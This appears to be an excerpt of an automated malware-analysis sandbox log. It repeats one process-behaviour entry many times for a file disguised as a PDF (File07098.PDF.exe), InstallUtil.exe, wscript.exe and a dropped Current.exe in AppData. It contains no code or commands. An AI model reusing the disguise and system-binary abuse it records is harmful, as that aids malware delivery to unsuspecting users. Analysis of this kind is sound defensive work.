                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
